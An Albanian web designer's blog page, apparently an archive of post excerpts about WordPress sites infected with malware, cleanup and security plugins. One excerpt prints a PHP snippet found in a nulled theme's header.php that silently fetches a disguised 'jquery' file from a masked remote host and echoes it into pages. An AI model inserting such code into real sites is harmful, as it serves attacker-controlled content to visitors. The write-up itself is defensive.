Siguri
Bazuar ne problemet qe kam hasur gjate punes sime si webdesigner vendosa qe te shkruaja nje artikull per te gjithe ju qe jeni futur ne rrugen e webdesign dhe nuk keni hasur ende ne probleme si psh t’ju infektohet faqja me viruse, etj.
Me pelqen qe kete artikull ta cilesoj si nje artikull ku pershkruaj praktikat me te mira te sigurimit te webfaqeve. Nuk do flas ketu per sigurine e serverave etj, pasi eshte dicka qe nuk eshte ne doren tone ne pjesen me te madhe te kohes (pervec rasteve kur ne zgjedhim me deshiren tone nje host jo te sigurte). Keshtu qe do flas me se tepermi per sigurine e aplikacioneve web ose te faqeve te internetit.
Isha duke testuar sot disa nulled themes ne serverin tim privat te krijuar me xampp ne kompjuterin tim. Po testoja disa themes nulled nga TheFoundryTheme. Vura re se kur hapja faqen time ne localhost me dilte ky error:
403 Forbidden
Request forbidden by administrative rules.
Kontrollova kodin e themes sepse nuk e dija se cfare shkaktonte qe te shfaqej ky error dhe gjeta ne filen header.php keto kode:
<?php
if(function_exists('curl_init'))
{
$url = "http://*****.***/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
Nje prej faqeve te mia pak dite me pare ishte infektuar me viruse. Faqja eshte ndertuar me WordPress. Po te vizitoni faqen Visit Gjirokastra sot do te vereni se cdo gje eshte tani ok dhe nuk ka me virus. Kjo sepse dje kam punuar shume qe te pastroja faqen. Problemi nuk qendronte tek masat paraprake qe kisha marre une per te siguaruar faqen. Patjeter qe kisha backup dhe mund te beja thjesht nje restore te backup-it i cili ishte i paster pa viruse.
Problemi ishte pak me i ngaterruar (ose te pakten keshtu me duket mua). Kur e hapja faqen me Internet Explorer nuk kisha problem, kur e hapja faqen me Google Chrome perseri nuk kisha problem. Nderkohe qe kur e hapja faqen me Mozilla Firefox antivirusi Kaspersky me jepte shenje virusi ne procesin firefox.exe.
Prandaj ishte pak a ngaterruar situata dhe nuk po kuptoja nqs vertet kisha virus apo jo ne faqe sepse ishte shume e cuditshme kjo gje qe po ndodhte … por mesa duket virusi ishte ndertuar qe te funskiononte vetem me gecko (engine qe eshte ne core te Mozillas) dhe me asnje lloj tjeter browseri. Pra arrita ne konkluzionin qe ishte vertet nje virus (Kaspersky nuk para gabon!) dhe duhej ta hiqja. Por nuk doja te ktheja backupin sepse doja fillimisht te gjeja kodin e virusit ta identifikoja ne cilin file ishte.
Gjitha ideja qendron ketu. Kur hapet nje faqe … ajo faqe ben request ne server nje numer te madh filesh. Dhe duke qene se ne cdo load te faqes do behen request pjesa me e madhe e fileve (ketu ndikon dhe cache e Mozillas) dhe gjate cdo loadi mua faqja me dilte e infektuar … logjikisht nje prej fileve qe behet request ne server ishte i infektuar.
Pershendetje te gjitheve … ne kete artikull do flas pak per disa plugine te cilat rrisin sigurine e platformes se blogimit WordPress. Para disa kohesh disa prej faqeve te mia u infektuan me virus por kete e kam shpjeguar me qarte tek artikulli “Si te sigurojme WordPress-in nga hackimet!“.
Bazuar ne kete artikull, ne eksperiencen qe marre gjate kesaj situate … vendosa qe te shkruaj kete artikull se si te sigurojme platformen kunder sulmeve dhe hackimeve. Artikulli eshte shkruar duke pasur parasysh dy situata. Situata kur faqja juaj eshte aktualisht e sulmuar dhe ju duhet ta pastroni nga malwaret (kjo pjese pak a shume shpjegohet me qarte tek artikulli Si te sigurojme WordPress-in nga hackimet!) dhe situata e dyte eshte kur faqja jone nuk eshte sulmuar dhe ne duhet te sigurohemi qe te mos hackohet. Duke e pare ceshtjen ne kete aspekt do ti ndajme pluginet ne dy tipe, plugine sigurie profilaktike (qe ndihmojne qe faqja mos te hackohet) dhe plugine sigurie me efekt pastrimi.
Kohet e fundit kam pasur disa probleme me faqen time personale www.arberbraja.com. Konkretisht faqja po hostonte viruse, disa lloje trojanesh. Ishte hera e pare qe kisha te beja me nje situate te tille kur viruset infektojne faqe interneti dhe normalisht dijenite e mia ne kete fushe ishin te pakta. Nuk kisha idene me te vogel se cfare te beja qe te zgjidhja problemin.
Pastaj pasi e analizova pak situaten kuptova qe i gjithe problemi qendronte tek WordPress (platforma ime e preferuar e blogimit dhe e nderthurrur kjo me nje problem sigurie ne server lindi gjithe problemi). Kete e kuptova pasi vura re se faqja ime kryesore www.arberbraja.com nuk ishte infektuar me viruse por vetem sektori i blogut (www.arberbraja.com/blogĀ ku eshte instaluar wordpressi) pra logjikisht te ben te mendosh qe problemi qendron tek WordPressi ose me sakte tek konfigurimi i serverit ne lidhje me wordpressin sepse wordpressi ne vetvete ishte 100% i azhornuar dhe ne themes dhe ne plugins. Faqja ime kryesore www.arberbraja.com (qe eshte ndertuar me nje costum cms qe e kam bere vete) nuk u infektua asnjehere gjate gjithe kohes kur sektori i blogut ka qene i infektuar. Dhe per ta vertetuar me shume qe problemi qendronte tek WordPress-i mund te them qe te gjitha faqet e tjera te mia te punuara me wordpress te hostuara ne te njejtin host me www.arberbraja.com paten te njejtin fat dhe u infektuan me te njejtin virus. Por theksoj … vetem faqet me wordpress u infektuan.
